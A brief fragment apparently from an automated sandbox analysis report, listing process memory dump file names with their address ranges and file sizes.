        • memory/1956-140-0x0000000000000000-mapping.dmp
        • memory/1956-89-0x00000000026A0000-0x00000000032EA000-memory.dmp
          Filesize

          12.3MB

        • memory/1956-74-0x0000000000000000-mapping.dmp
        • memory/2028-159-0x0000000002D00000-0x0000000002E00000-memory.dmp
          Filesize

          1024KB

        • memory/2028-169-0x0000000004C70000-0x00000000058BA000-memory.dmp
          Filesize

          12.3MB

        • memory/2028-154-0x0000000000405E28-mapping.dmp
        • memory/2028-157-0x0000000000400000-0x000000000055E000-memory.dmp
          Filesize

          1.4MB

        • memory/2044-166-0x0000000000000000-mapping.dmp